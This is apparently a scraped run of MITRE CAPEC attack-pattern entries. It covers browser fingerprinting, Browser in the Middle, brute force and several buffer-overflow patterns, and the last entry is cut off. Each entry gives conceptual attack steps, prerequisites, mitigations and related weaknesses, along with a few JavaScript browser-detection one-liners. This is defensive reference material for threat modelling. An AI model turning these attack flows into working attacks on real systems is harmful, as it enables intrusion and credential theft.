Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser

Mitigations

Configuration: Disable Java Script in the browser

Example Instances

The following code snippets can be used to detect various browsers:

Firefox 2/3

FF=/a/[-1]=='a'

Firefox 3

FF3=(function x(){})[-5]=='x'

Firefox 2

FF2=(function x(){})[-6]=='x'

IE='\v'=='v'

Safari

Saf=/a/.__proto__=='//'

Chrome

Chr=/source/.test((/a/.toString+''))

Opera

Op=/^function \(/.test([].sort)

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-410] Gareth Heyes. "Detecting browsers javascript hacks". The Spanner. 2009-01-29. <http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-701: Browser in the Middle (BiTM)

Attack Pattern ID: 701

Abstraction: Standard

View customized information:

Description

Extended Description

Unlike Adversary in the Browser, the victim does not need to install a malicious application. Browser in the Middle uses the inherent functionalities of a web browser to convince the victim they are browsing normally under the assumption that the connection is secure. All the actions performed by the victim in the open window are actually performed on the machine of the adversary. These victim-authenticated sessions are available to the adversary to use. All entered data such as passwords and usernames can be logged by the adversary and the content displayed to the victim can be altered arbitrarily. Varieties of multifactor authentication which rely solely on user input and do not use a form of hardware-based secret exchange are vulnerable to browser in the middle.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	98	Phishing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Identify potential targets: The adversary identifies an application or service that the target is likely to use.

Techniques
The adversary stands up a server to host the transparent browser and entices victims to use it by using a domain name similar to the legitimate application. In addition to the transparent browser, the adversary could also install a web proxy, sniffer, keylogger, and other tools to assist in their goals.

Experiment

Lure victims: The adversary crafts a phishing campaign to lure unsuspecting victims into using the transparent browser.
Techniques
An adversary can create a convincing email with a link to download the web client and interact with the transparent browser.

Exploit

Monitor and Manipulate Data: When the victim establishes the connection to the transparent browser, the adversary can view victim activity and make alterations to what the victim sees when browsing the web.

Techniques
Once a victim has established a connection to the transparent browser, the adversary can use installed tools such as a web proxy, keylogger, or additional malicious browser extensions to gather and manipulate data or impersonate the victim.

Prerequisites

The adversary must create a convincing web client to establish the connection. The victim then needs to be lured onto the adversary's webpage. In addition, the victim's machine must not use local authentication APIs, a hardware token, or a Trusted Platform Module (TPM) to authenticate.

Skills Required

[Level: Medium]

Resources Required

A web application with a client is needed to enable the victim's browser to establish a remote desktop connection to the system of the adversary.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges	High
Confidentiality Authorization	Read Data	High
Integrity	Modify Data	Medium

Mitigations

Implementation: Use strong, mutual authentication to fully authenticate with both ends of any communications channel

Related Weaknesses

CWE-ID	Weakness Name
294	Authentication Bypass by Capture-replay
345	Insufficient Verification of Data Authenticity

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-747] Tommasi F., Catalano, C. and Taurino I.. "Browser-in-the-Middle (BitM) attack". 2021-04-17. <https://link.springer.com/article/10.1007/s10207-021-00548-5#citeas>. URL validated: 2023-01-13.

Content History

Submissions
Submission Date	Submitter	Organization
2023-01-24 (Version 3.9)	Jonas Tzschoppe	Nuremberg Institute of Technology
2023-01-24 (Version 3.9)

CAPEC-112: Brute Force

Attack Pattern ID: 112

Abstraction: Meta

View customized information:

Description

Extended Description

Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	20	Encryption Brute Forcing
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Employ Probabilistic Techniques

Execution Flow

Explore

Determine secret testing procedure: Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.

Techniques

Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.

Reduce search space: Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.

Techniques
If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.

Expand victory conditions: It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.

Exploit

Gather information so attack can be performed independently.: If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).

Prerequisites

The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct.

Skills Required

[Level: Low]

The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located.

Resources Required

None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures.

Indicators

Repeated submissions of incorrect secret values may indicate a brute force attack. For example, repeated bad passwords when accessing user accounts or repeated queries to databases using non-existent keys.

Attempts to download files protected by secrets (usually using encryption) may be a precursor to an offline attack to break the file's encryption and read its contents. This is especially significant if the file itself contains other secret values, such as password files.

If the attacker is able to perform the checking offline then there will likely be no indication that an attack is ongoing.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.

Use a secret space that is well known and with no known patterns that may reduce functional size.

Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.

Related Weaknesses

CWE-ID	Weakness Name
330	Use of Insufficiently Random Values
326	Inadequate Encryption Strength
521	Weak Password Requirements

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1110	Brute Force

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
11	Brute Force

Relevant to the OWASP taxonomy mapping

Entry Name
Brute force attack

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Mitigations, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-123: Buffer Manipulation

Attack Pattern ID: 123

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	540	Overread Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Prerequisites

The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality	Execute Unauthorized Commands Modify Data Read Data

Mitigations

To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied.

Related Weaknesses

CWE-ID	Weakness Name
119	Improper Restriction of Operations within the Bounds of a Memory Buffer

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Activation_Zone, Attack_Motivation-Consequences, Injection_Vector, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Solutions_and_Mitigations
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses

CAPEC-8: Buffer Overflow in an API Call

Attack Pattern ID: 8

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	46	Overflow Variables and Tags
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	69	Target Programs with Elevated Privileges

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these.

Experiment

Find injection vector: The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.
Techniques
Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

Craft overflow content: The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer.

Prerequisites

The target host exposes an API to the user.

One or more API functions exposed by the target host has a buffer overflow vulnerability.

Skills Required

[Level: Low]

An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Use a language or compiler that performs automatic bounds checking.

Use secure functions not vulnerable to buffer overflow.

If you have to use dangerous functions, make sure that you do boundary checking.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Use OS-level preventative functionality. Not a complete solution.

Example Instances

Attack Example: Libc in FreeBSD

A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.

Xtlib

A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
118	Incorrect Access of Indexable Resource ('Range Error')
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
733	Compiler Optimization Removal or Modification of Security-critical Code
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-9: Buffer Overflow in Local Command-Line Utilities

Attack Pattern ID: 9

Abstraction: Detailed

View customized information:

Description

This attack targets command-line utilities available in a number of shells. An adversary can leverage a vulnerability found in a command-line utility to escalate privilege to root.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	69	Target Programs with Elevated Privileges

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target system: The adversary first finds a target system that they want to gain elevated priveleges on. This could be a system they already have some level of access to or a system that they will gain unauthorized access at a lower privelege using some other means.
Find injection vector: The adversary identifies command line utilities exposed by the target host that contain buffer overflow vulnerabilites. The adversary likely knows which utilities have these vulnerabilities and what the effected versions are, so they will also obtain version numbers for these utilities.

Experiment

Craft overflow command: Once the adversary has found a vulnerable utility, they will use their knownledge of the vulnerabilty to create the command that will exploit the buffer overflow.

Exploit

Overflow the buffer: Using the injection vector, the adversary executes the crafted command, gaining elevated priveleges on the machine.

Prerequisites

The target host exposes a command-line utility to the user.

The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited.

Skills Required

[Level: Low]

An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data
Availability	Unreliable Execution
Confidentiality	Read Data

Mitigations

Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as buffer overflow.

Use a language or compiler that performs automatic bounds checking.

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Operational: Use OS-level preventative functionality. Not a complete solution.

Apply the latest patches to your user exposed services. This may not be a complete solution, especially against a zero day attack.

Do not unnecessarily expose services.

Example Instances

Attack Example: HPUX passwd

A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.

Attack Example: Solaris getopt

A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
118	Incorrect Access of Indexable Resource ('Range Error')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
733	Compiler Optimization Removal or Modification of Security-critical Code
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-10: Buffer Overflow via Environment Variables

Attack Pattern ID: 10

Abstraction: Detailed

View customized information:

Description

Extended Description

Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	13	Subverting Environment Variable Values
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	46	Overflow Variables and Tags
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	69	Target Programs with Elevated Privileges

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques
Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.

Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

Prerequisites

The application uses environment variables.

An environment variable exposed to the user is vulnerable to a buffer overflow.

The vulnerable environment variable uses untrusted data.

Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.

Skills Required

[Level: Low]

An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Indicators

If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application's code is well written, that failure should trigger an alert.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Do not expose environment variable to the user.

Do not use untrusted data in your environment variables.

Use a language or compiler that performs automatic bounds checking

There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.

Example Instances

A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906

A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
302	Authentication Bypass by Assumed-Immutable Data
118	Incorrect Access of Indexable Resource ('Range Error')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
99	Improper Control of Resource Identifiers ('Resource Injection')
20	Improper Input Validation
680	Integer Overflow to Buffer Overflow
733	Compiler Optimization Removal or Modification of Security-critical Code
697	Incorrect Comparison

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Buffer Overflow via Environment Variables

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

[REF-2] "Sharefuzz". <http://sharefuzz.sourceforge.net>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow, Extended_Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-47: Buffer Overflow via Parameter Expansion

Attack Pattern ID: 47

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques

In this attack, the normal method of providing large user input does not work. The program performs bounds checking on the user input, but not the expanded user input. The adversary needs to provide input that they believe will be expanded by the program to overflow a buffer. To identify where this is possible, an adversary either needs to have knowledge of the inner workings of the program or use a disassembler and other reverse engineering tools to guide the search.

